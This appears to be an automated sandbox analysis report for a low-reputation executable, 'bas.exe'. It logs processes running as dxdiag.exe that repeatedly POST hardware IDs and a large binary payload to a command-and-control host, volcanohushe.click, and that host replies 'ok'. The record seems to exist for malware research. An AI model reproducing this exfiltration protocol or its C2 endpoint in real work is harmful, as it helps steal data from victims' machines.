2024-12-23 00:22:11 UTC | 1369 | IN | Data Raw: 5a 34 77 75 48 6e 73 74 43 77 5a 39 43 47 2b 74 73 54 69 68 39 6e 75 70 77 42 71 2b 6e 68 6f 35 6c 59 4b 65 2b 32 4f 4b 67 59 4d 74 6b 6d 6b 4b 4e 79 63 41 51 53 70 4e 4c 4f 54 79 50 72 4f 2f 4c 2b 62 6d 45 36 65 59 52 6e 48 55 6e 4e 76 76 4c 34 32 41 7a 6e 2f 54 59 41 30 2b 49 41 70 46 4b 6b 74 2b 71 37 51 72 71 2f 4a 39 74 4d 30 56 71 5a 6b 51 4a 70 65 46 6b 2f 31 6a 6d 49 57 4f 4a 4a 67 67 53 58 73 74 48 77 5a 39 43 45 2b 39 70 44 4f 73 38 32 47 74 78 68 32 36 6d 51 31 72 32 73 4f 45 38 58 37 4b 31 4a 67 33 68 47 63 59 64 54 4e 48 51 53 6b 49 4e 4f 71 30 4d 4b 33 34 63 61 6a 56 47 36 71 62 45 69 4b 64 68 35 33 31 62 34 36 49 69 53 4b 51 62 41 77 38 4b 51 68 43 4c 45 5a 6c 70 66 4a 33 36 2f 68 76 35 70 39 65 6a 59 38 65 4a 35 6e 44 69 72 68 32 79 6f 75
Data Ascii: Z4wuHnstCwZ9CG+tsTih9nupwBq+nho5lYKe+2OKgYMtkmkKNycAQSpNLOTyPrO/L+bmE6eYRnHUnNvvL42Azn/TYA0+IApFKkt+q7Qrq/J9tM0VqZkQJpeFk/1jmIWOJJggSXstHwZ9CE+9pDOs82Gtxh26mQ1r2sOE8X7K1Jg3hGcYdTNHQSkINOq0MK34cajVG6qbEiKdh531b46IiSKQbAw8KQhCLEZlpfJ36/hv5p9ejY8eJ5nDirh2you
2024-12-23 00:22:11 UTC | 1369 | IN | Data Raw: 45 64 6a 61 69 64 4e 4d 30 31 72 76 50 41 4d 71 50 46 35 6f 64 46 65 73 36 74 54 61 35 75 5a 31 61 35 57 6b 38 79 4a 4b 39 4d 34 52 79 34 74 42 30 45 2f 58 6d 75 6d 6f 7a 4b 6d 38 31 57 70 77 41 69 76 6d 78 34 36 6e 63 2b 65 2b 79 2f 45 7a 49 6b 2f 30 7a 68 48 46 43 30 52 52 51 70 4c 66 61 50 79 64 2b 76 34 59 65 61 66 58 70 4c 55 44 79 69 45 67 4a 72 6e 55 63 72 55 6c 78 6e 54 61 78 45 38 4f 67 52 51 4c 6b 56 67 75 34 78 35 38 36 73 6c 39 4a 56 4d 2f 6f 74 64 4e 4b 76 4e 31 66 63 76 30 72 57 58 5a 34 55 67 58 32 6c 6b 52 31 52 6c 45 43 7a 74 73 53 75 35 2b 58 53 77 78 46 6d 53 71 6a 6f 39 6e 6f 53 46 38 58 69 46 7a 4d 42 6e 6e 43 42 66 41 6d 6f 4f 51 54 35 5a 65 71 65 69 50 75 76 41 4f 65 62 66 58 76 54 55 4b 43 69 61 6a 5a 4c 67 66 73 65 72 6d 43 32 55
Data Ascii: EdjaidNM01rvPAMqPF5odFes6tTa5uZ1a5Wk8yJK9M4Ry4tB0E/XmumozKm81WpwAivmx46nc+e+y/EzIk/0zhHFC0RRQpLfaPyd+v4YeafXpLUDyiEgJrnUcrUlxnTaxE8OgRQLkVgu4x586sl9JVM/otdNKvN1fcv0rWXZ4UgX2lkR1RlECztsSu5+XSwxFmSqjo9noSF8XiFzMBnnCBfAmoOQT5ZeqeiPuvAOebfXvTUKCiajZLgfsermC2U
2024-12-23 00:22:11 UTC | 1369 | IN | Data Raw: 73 4b 53 57 6c 47 5a 36 71 31 4b 62 33 6b 4f 36 37 45 42 4c 61 71 49 77 43 59 68 5a 4c 73 61 49 79 71 72 6d 66 64 49 41 68 37 63 6a 34 47 62 51 68 54 35 50 49 68 36 36 63 33 6b 38 51 51 6f 70 4d 4c 4f 74 6d 72 74 73 78 56 79 4b 43 4a 4d 74 46 55 41 43 73 37 44 45 73 70 43 43 4c 71 74 48 6e 7a 72 7a 6e 6d 77 77 2f 73 7a 45 31 35 7a 39 62 47 6f 54 2f 59 6b 38 41 2b 30 33 5a 48 59 33 68 4a 42 6a 63 49 4e 4f 72 31 4f 72 6e 74 63 61 58 52 48 65 75 71 49 77 79 61 68 4a 54 67 66 35 32 44 73 42 6d 47 59 77 6b 31 4c 52 46 58 5a 51 59 73 70 66 4a 68 6b 72 38 2f 35 76 68 51 37 49 78 64 63 39 53 32 6c 76 68 68 6a 5a 71 66 61 72 52 75 41 44 6f 38 46 31 45 71 43 43 4c 71 74 48 6e 7a 72 54 6e 6d 77 77 2f 73 7a 45 31 35 7a 39 62 47 6f 54 2f 59 6b 38 41 2b 30 33 5a 48 59
                                                                                                      Data Ascii: sKSWlGZ6q1Kb3kO67EBLaqIwCYhZLsaIyqrmfdIAh7cj4GbQhT5PIh66c3k8QQopMLOtmrtsxVyKCJMtFUACs7DEspCCLqtHnzrznmww/szE15z9bGoT/Yk8A+03ZHY3hJBjcINOr1OrntcaXRHeuqIwyahJTgf52DsBmGYwk1LRFXZQYspfJhkr8/5vhQ7Ixdc9S2lvhhjZqfarRuADo8F1EqCCLqtHnzrTnmww/szE15z9bGoT/Yk8A+03ZHY
                                                                                                      2024-12-23 00:22:11 UTC1369INData Raw: 71 54 79 36 4b 74 53 2b 6f 76 7a 6e 6d 79 31 37 30 31 42 77 68 68 49 36 61 38 53 4f 4e 6c 6f 6c 6e 33 53 41 4a 65 33 4a 48 52 79 39 59 59 61 57 31 64 61 33 78 65 65 62 59 55 4c 58 55 43 32 76 4d 30 4e 75 32 66 63 72 55 7a 6d 43 51 63 68 55 39 4b 52 46 46 59 6e 5a 53 68 36 41 2b 75 2f 77 31 6c 38 6f 61 75 6f 45 65 4f 35 4f 39 71 39 74 39 6a 5a 79 4e 5a 61 4a 32 42 44 73 6b 41 41 5a 72 43 48 54 71 36 6e 6d 47 37 58 43 32 78 46 37 69 31 42 46 72 7a 4d 4f 59 35 47 69 61 6a 38 49 67 69 57 64 48 4a 47 51 65 42 6a 4d 49 4e 50 6e 38 65 62 6d 2f 4c 2b 61 41 45 4b 47 56 48 69 57 58 6b 59 66 77 62 4a 79 50 79 52 6d 74 54 52 55 38 4f 67 51 45 46 45 56 6f 76 4b 63 36 75 2f 68 4a 6d 4f 6f 4d 71 34 51 65 61 62 69 45 6d 50 70 52 74 4c 75 66 49 49 4d 69 49 54 67 38 42 41
                                                                                                      Data Ascii: qTy6KtS+ovznmy1701BwhhI6a8SONloln3SAJe3JHRy9YYaW1da3xeebYULXUC2vM0Nu2fcrUzmCQchU9KRFFYnZSh6A+u/w1l8oauoEeO5O9q9t9jZyNZaJ2BDskAAZrCHTq6nmG7XC2xF7i1BFrzMOY5Giaj8IgiWdHJGQeBjMINPn8ebm/L+aAEKGVHiWXkYfwbJyPyRmtTRU8OgQEFEVovKc6u/hJmOoMq4QeabiEmPpRtLufIIMiITg8BA


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.8  49708        104.21.71.155   443               7524  C:\Windows\SysWOW64\dxdiag.exe

Timestamp: 2024-12-23 00:22:13 UTC   Bytes transferred: 284   Direction: OUT
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=MA0CHNK04GEMHC3RI7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12851
    Host: volcanohushe.click
Timestamp: 2024-12-23 00:22:13 UTC   Bytes transferred: 12851   Direction: OUT
    Data Ascii (multipart body decoded from the hex dump; truncated in the report):
    --MA0CHNK04GEMHC3RI7
    Content-Disposition: form-data; name="hwid"

    2F99694A4032E18DAC8923850305D13E
    --MA0CHNK04GEMHC3RI7
    Content-Disposition: form-data; name="pid"

    2
    --MA0CHNK04GEMHC3RI7
    Content-Disposition: form-data; name="lid"

    pqZnKP--ZnVja
Timestamp: 2024-12-23 00:22:14 UTC   Bytes transferred: 1130   Direction: IN
    HTTP/1.1 200 OK
    Date: Mon, 23 Dec 2024 00:22:14 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=abhpjbqbf0sulmtg6qlapc9ko6; expires=Thu, 17 Apr 2025 18:08:53 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2IX9GTEtF8tSdHoDVhohM79a2E%2BTp7EPKBo66iThEwM8eIXZeAoEERpc9s4jDtHNL%2BbURiaIhCU3FiUKtzaxlHUEY7IoIJM5wz0vLIX57dCPrH1ShJ9gIxlOrUIgQJf%2FjBpQzwM%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f6432308bccf3bb-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1589&rtt_var=619&sent=14&recv=18&lost=0&retrans=0&sent_bytes=2843&recv_bytes=13793&delivery_rate=1736028&cwnd=80&unsent_bytes=0&cid=27446a17c365e604&ts=998&x=0"
Timestamp: 2024-12-23 00:22:14 UTC   Bytes transferred: 20   Direction: IN
    Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: f<CRLF>ok 8.46.123.189<CRLF>   (one chunk of size 0xf carrying "ok 8.46.123.189")
Timestamp: 2024-12-23 00:22:14 UTC   Bytes transferred: 5   Direction: IN
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0<CRLF><CRLF>   (terminating zero-length chunk)


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.8  49709        104.21.71.155   443               7524  C:\Windows\SysWOW64\dxdiag.exe

Timestamp: 2024-12-23 00:22:16 UTC   Bytes transferred: 278   Direction: OUT
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=QYJM3V1ZQPMP
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15044
    Host: volcanohushe.click
Timestamp: 2024-12-23 00:22:16 UTC   Bytes transferred: 15044   Direction: OUT
    Data Ascii (multipart body decoded from the hex dump; truncated in the report):
    --QYJM3V1ZQPMP
    Content-Disposition: form-data; name="hwid"

    2F99694A4032E18DAC8923850305D13E
    --QYJM3V1ZQPMP
    Content-Disposition: form-data; name="pid"

    2
    --QYJM3V1ZQPMP
    Content-Disposition: form-data; name="lid"

    pqZnKP--ZnVja2luZ1
    --QYJM3V1ZQ
Timestamp: 2024-12-23 00:22:17 UTC   Bytes transferred: 1130   Direction: IN
    HTTP/1.1 200 OK
    Date: Mon, 23 Dec 2024 00:22:16 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=r0gndtqh081t6tn6dj72k0f5v6; expires=Thu, 17 Apr 2025 18:08:55 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bldo2B%2F2oxV2eSN7FDxAIXE7Ie33S16J477JPN1Nz0tqkuNHqwLSG1iG4I5QS2K6DJOqIeID4QqbjyR5HLUo5O2To9y5f2VYQHscg4bXF3iPuvJKz3WFi9ccyAuRMRrHdxoD80o%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f6432400f79de98-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1592&rtt_var=610&sent=17&recv=19&lost=0&retrans=0&sent_bytes=2842&recv_bytes=15980&delivery_rate=1834170&cwnd=212&unsent_bytes=0&cid=1fcb17ae0e9328d4&ts=1020&x=0"
Timestamp: 2024-12-23 00:22:17 UTC   Bytes transferred: 20   Direction: IN
    Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: f<CRLF>ok 8.46.123.189<CRLF>   (one chunk of size 0xf carrying "ok 8.46.123.189")
Timestamp: 2024-12-23 00:22:17 UTC   Bytes transferred: 5   Direction: IN
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0<CRLF><CRLF>   (terminating zero-length chunk)


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.8  49710        104.21.71.155   443               7524  C:\Windows\SysWOW64\dxdiag.exe

Timestamp: 2024-12-23 00:22:18 UTC   Bytes transferred: 280   Direction: OUT
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=95LDDMB43LT0XK
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20223
    Host: volcanohushe.click
Timestamp: 2024-12-23 00:22:18 UTC   Bytes transferred: 15331   Direction: OUT
    Data Ascii (multipart body decoded from the hex dump; truncated in the report):
    --95LDDMB43LT0XK
    Content-Disposition: form-data; name="hwid"

    2F99694A4032E18DAC8923850305D13E
    --95LDDMB43LT0XK
    Content-Disposition: form-data; name="pid"

    3
    --95LDDMB43LT0XK
    Content-Disposition: form-data; name="lid"

    pqZnKP--ZnVja2luZ1
    --95L
Timestamp: 2024-12-23 00:22:18 UTC   Bytes transferred: 4892   Direction: OUT
    Data Raw: (binary payload; hex dump and its unreadable ASCII rendering not reproduced)
Timestamp: 2024-12-23 00:22:19 UTC   Bytes transferred: 1130   Direction: IN
    HTTP/1.1 200 OK
    Date: Mon, 23 Dec 2024 00:22:19 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=0l0a1mhcu92cni78ls4vu43v7s; expires=Thu, 17 Apr 2025 18:08:58 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tx%2BZsEnAEms4AKRaegBQFM5R76y6lLXWalZkMseGUJcKcN8nQiWdJqBiCf8ffYqKscRas2HR4T14exdHvRN7X7V6GyLBgJkxtfyn%2BmSWRzNpzPz5xZNIFxzLkFbJRg6a7psXFZc%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f6432508fa37c6c-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1842&min_rtt=1829&rtt_var=712&sent=13&recv=24&lost=0&retrans=0&sent_bytes=2842&recv_bytes=21183&delivery_rate=1509043&cwnd=189&unsent_bytes=0&cid=18349179cf40d890&ts=1229&x=0"
Timestamp: 2024-12-23 00:22:19 UTC   Bytes transferred: 20   Direction: IN
    Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: f<CRLF>ok 8.46.123.189<CRLF>   (one chunk of size 0xf carrying "ok 8.46.123.189")
Timestamp: 2024-12-23 00:22:19 UTC   Bytes transferred: 5   Direction: IN
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0<CRLF><CRLF>   (terminating zero-length chunk)


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.8  49712        104.21.71.155   443               7524  C:\Windows\SysWOW64\dxdiag.exe

Timestamp: 2024-12-23 00:22:21 UTC   Bytes transferred: 277   Direction: OUT
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=ZEM9UWIBZYJT
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1208
    Host: volcanohushe.click
Timestamp: 2024-12-23 00:22:21 UTC   Bytes transferred: 1208   Direction: OUT
    Data Ascii (multipart body decoded from the hex dump; truncated in the report):
    --ZEM9UWIBZYJT
    Content-Disposition: form-data; name="hwid"

    2F99694A4032E18DAC8923850305D13E
    --ZEM9UWIBZYJT
    Content-Disposition: form-data; name="pid"

    1
    --ZEM9UWIBZYJT
    Content-Disposition: form-data; name="lid"

    pqZnKP--ZnVja2luZ1
    --ZEM9UWIBZ
Timestamp: 2024-12-23 00:22:22 UTC   Bytes transferred: 1126   Direction: IN
    HTTP/1.1 200 OK
    Date: Mon, 23 Dec 2024 00:22:21 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=esm1aa4ch5m6ere70090o72sqr; expires=Thu, 17 Apr 2025 18:09:00 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9edhK55LY2U6NoR7nzbKAoccUbahjUqjm0V31m4fiapv6pE5y0am49dRE9NAbmkjRNxmnnFnWj8scrDcyQe2OVfvIjA3ZB8p2%2FU1frKNEwVU26idM6w1%2FEv7XNEzL2XXIsDd4t8%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f643260cd468c7b-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1836&min_rtt=1831&rtt_var=698&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2121&delivery_rate=1554845&cwnd=186&unsent_bytes=0&cid=5132ea87e9df5207&ts=772&x=0"
Timestamp: 2024-12-23 00:22:22 UTC   Bytes transferred: 20   Direction: IN
    Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: f<CRLF>ok 8.46.123.189<CRLF>   (one chunk of size 0xf carrying "ok 8.46.123.189")
Timestamp: 2024-12-23 00:22:22 UTC   Bytes transferred: 5   Direction: IN
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0<CRLF><CRLF>   (terminating zero-length chunk)


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      6192.168.2.849713104.21.71.1554437524C:\Windows\SysWOW64\dxdiag.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-23 00:22:23 UTC278OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=2IWMDEENI15
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 571518
                                                                                                      Host: volcanohushe.click
2024-12-23 00:22:23 UTC | 15331 | OUT | Data Ascii:
--2IWMDEENI15
Content-Disposition: form-data; name="hwid"

2F99694A4032E18DAC8923850305D13E
--2IWMDEENI15
Content-Disposition: form-data; name="pid"

1
--2IWMDEENI15
Content-Disposition: form-data; name="lid"

pqZnKP--ZnVja2luZ1
--2IWMDEENI15
2024-12-23 00:22:26 UTC | 1135 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Mon, 23 Dec 2024 00:22:26 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=714098cpj3nbn3io0hce7tdnbe; expires=Thu, 17 Apr 2025 18:09:04 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C19hEepDDQ6AYG%2BMZgGor1yMcdbrubVWC7SedLWFNgAOfXrimZrVmdT34OTZKFogp4FDfWdoPDXSfa3pZ0ig4vKnFPpEgHXmJvmaj8femhBiCZVnr38s%2F%2FD27nYNGmcvtXiX08k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f6432700ba543fd-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1594&min_rtt=1586&rtt_var=611&sent=328&recv=590&lost=0&retrans=0&sent_bytes=2844&recv_bytes=574060&delivery_rate=1768625&cwnd=217&unsent_bytes=0&cid=596c55945f25a127&ts=2491&x=0"


                                                                                                      Target ID:0
                                                                                                      Start time:19:22:02
                                                                                                      Start date:22/12/2024
                                                                                                      Path:C:\Users\user\Desktop\bas.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Users\user\Desktop\bas.exe"
                                                                                                      Imagebase:0x7ff64f040000
                                                                                                      File size:13'164'032 bytes
                                                                                                      MD5 hash:D5139AE53CB10A64C9245BBF3447ED1C
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:2
                                                                                                      Start time:19:22:06
                                                                                                      Start date:22/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                                                                      Imagebase:0x70000
                                                                                                      File size:222'720 bytes
                                                                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      Target ID:3
                                                                                                      Start time:19:22:06
                                                                                                      Start date:22/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                                                                      Imagebase:0x70000
                                                                                                      File size:222'720 bytes
                                                                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true
